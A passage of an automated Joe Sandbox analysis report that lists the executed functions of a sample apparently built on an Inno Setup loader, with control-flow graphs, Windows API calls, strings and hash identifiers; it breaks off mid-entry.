6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

                                                                  Executed Functions

                                                                  Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 126 409b97 124->126 127 409b99-409b9b 124->127 125->124 128 409b7a-409b7d 125->128 126->127 130 409baa-409bad 127->130 128->124 129 409b7f-409b82 128->129 129->124 129->127 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                  • String ID:
                                                                  • API String ID: 2441996862-0
                                                                  • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                  • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                  • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                  • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                  Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                  • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                  • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                  • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                  Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                  • API String ID: 3256987805-3653653586
                                                                  • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                  • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                  • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                  • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                  Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • SetLastError.KERNEL32 ref: 0040A0F4
                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0217237C), ref: 0040966C
                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                  • SetWindowLongA.USER32(000403E6,000000FC,00409918), ref: 0040A148
                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                  • 73A25CF0.USER32(000403E6,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                  • API String ID: 3341979996-3001827809
                                                                  • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                  • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                  • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                  • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                  Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                  • API String ID: 1646373207-2130885113
                                                                  • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                  • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                  • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                  • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                  Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                  • SetWindowLongA.USER32(000403E6,000000FC,00409918), ref: 0040A148
                                                                    • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                    • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000,00409A77), ref: 00409A14
                                                                    • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000), ref: 00409A28
                                                                    • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                    • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                    • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90), ref: 00409A5C
                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                  • 73A25CF0.USER32(000403E6,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                  • API String ID: 978128352-3001827809
                                                                  • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                  • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                  • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                  • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D
                                                                  Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000,00409A77), ref: 00409A14
                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90,00000000), ref: 00409A28
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                  • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0217237C,00409A90), ref: 00409A5C
                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0217237C), ref: 0040966C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                  • String ID: D
                                                                  • API String ID: 3356880605-2746444292
                                                                  • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                  • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                  • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                  • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                  Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: .tmp$y@
                                                                  • API String ID: 2030045667-2396523267
                                                                  • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                  • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                  • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                  • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED
                                                                  Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: .tmp$y@
                                                                  • API String ID: 2030045667-2396523267
                                                                  • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                  • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                  • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                  • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD
                                                                  Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID: .tmp
                                                                  • API String ID: 1375471231-2986845003
                                                                  • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                  • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                  • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                  • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5
                                                                  Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 324 4076e8-4076ea call 40748c 322->324 325 4076ef-4076f2 322->325 326 407770-407785 323->326 324->325 328 407700-407704 325->328 329 4076f4-4076fb call 4073ec 325->329 330 407787 326->330 331 4077f9 326->331 329->328 333 40778a-40778f 330->333 334 4077fd-407802 330->334 335 40783b-40783d 331->335 336 4077fb 331->336 338 407803-407819 333->338 340 407791-407792 333->340 334->338 339 407841-407843 335->339 336->334 341 40785b-40785c 338->341 349 40781b 338->349 339->341 342 407724-407741 340->342 343 407794-4077b4 340->343 345 4078d6-4078eb call 407890 InterlockedExchange 341->345 346 40785e-40788c 341->346 348 4077b5 342->348 350 407743 342->350 343->348 366 407912-407917 345->366 367 4078ed-407910 345->367 359 407820-407823 346->359 360 407890-407893 346->360 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 356 407746-407747 350->356 357 4077b9 350->357 353->357 354->331 355->359 356->321 361 4077bb-4077cd 356->361 357->361 363 407898 359->363 364 407824 359->364 360->363 361->339 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->335 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->326 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->335 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                  • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                  • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                  • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                  Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLibraryLoadMode
                                                                  • String ID:
                                                                  • API String ID: 2987862817-0
                                                                  • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                  • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                  • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                  • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                  Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
